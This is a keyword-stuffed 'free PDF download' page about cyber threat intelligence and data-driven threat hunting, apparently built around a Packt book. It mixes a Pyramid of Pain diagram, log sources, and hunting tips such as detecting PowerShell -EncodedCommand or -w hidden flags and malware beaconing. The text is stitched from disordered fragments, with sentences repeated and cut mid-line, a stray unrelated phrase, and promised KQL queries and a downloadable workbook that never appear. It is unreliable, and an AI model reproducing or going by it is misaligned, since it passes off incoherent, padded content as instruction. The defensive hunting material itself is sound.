Practical Threat Intelligence And Data-driven Threat Hunting Pdf Free Download ((top))
This is the active pursuit of threats within a network. By applying advanced analytics and machine learning to large security datasets, hunters identify anomalies or indicators of compromise (IoCs) that standard tools might miss. Blake Theater Key Frameworks and Methodologies
▲ / \ TTPs (Tactics, Techniques & Procedures) - Toughest to change / \------------------------------------------------------------- / \ Tools - Challenging to replace / \----------------------------------------------------------- | Network/Host Artifacts - Annoying to fix |------------------------------------------------------------------- | Domain Names - Simple to swap |------------------------------------------------------------------- | IP Addresses - Easy to change |------------------------------------------------------------------- | Hash Values - Trivial to modify └───────────────────────────────────────────────────────────────────
A hunt is only as good as the data supporting it. Hunters must know which logs contain the footprints of sophisticated adversaries. Critical Data Sources
While the book "" by Valentina Costa-Gazcón is a commercial publication, you can legally access it for free through a 7-day free trial on Packt or by checking it out as an ebook via OverDrive if your local library supports it .
A hunter can search for incoming network logons specifically requesting the WinRM service. In KQL (Kusto Query Language), the hunt looks like this: This is the active pursuit of threats within a network
To take your education further, download the PDF edition of this workbook, complete with code snippets, hunting playbooks, and configuration files for your home lab.
Good Hypothesis: "Adversaries are targeting our finance department using living-off-the-land binaries (LotLBin) like certutil.exe to download remote payloads." Step 2: Gather, Clean, and Enrich Data
Records of all domain resolutions (Port 53). Attackers using DGAs or communicating with malicious C2 domains leave footprints here.
Query Sysmon logs or Windows Event ID 4104 for the presence of flags like -EncodedCommand , -enc , -w hidden , or Bypass . These flags indicate an intentional effort to hide command actions from the user and basic logging. Use Case 2: Identifying Lateral Movement via WMI Hunters must know which logs contain the footprints
During a hunt, analysts may discover a brand-new, undocumented technique used by an attacker. This finding is documented and fed back into the internal threat intelligence repository, enriching the organization's localized threat profile. Essential Tooling Checklist
To make threat intelligence practical, it must be structured and actionable. The standard CTI lifecycle consists of six core phases:
Cyber threat intelligence is not just a collection of data feeds. It is refined, contextual knowledge about adversaries, their motivations, their intentions, and their technical methods.
Practical threat intelligence (CTI) and data-driven threat hunting (TH) have become essential pillars of modern, proactive cybersecurity strategies. While traditional security focuses on reacting to alerts from known threats, these disciplines aim to uncover advanced adversaries who have already bypassed automated defenses or are planning to do so. The Synergy Between Intelligence and Hunting In KQL (Kusto Query Language), the hunt looks
What specific (e.g., Splunk, Microsoft Sentinel, ELK) do you currently use?
Security Log (Event ID 4624 - Successful Logon) Sysmon Log: Process Creation (Event ID 1) 3. The Hunting Query (Splunk / KQL Syntax Example)
Export NetFlow data or firewall logs into an analysis tool like Jupyter Notebooks. Calculate the mathematical time delta between connections from internal IPs to external destination IPs. If an endpoint communicates with an external IP address exactly every 30 seconds for 48 hours straight, it indicates automated malware beaconing rather than human web surfing. Automation, Metrics, and Program Maturity Leveraging Automation with SOAR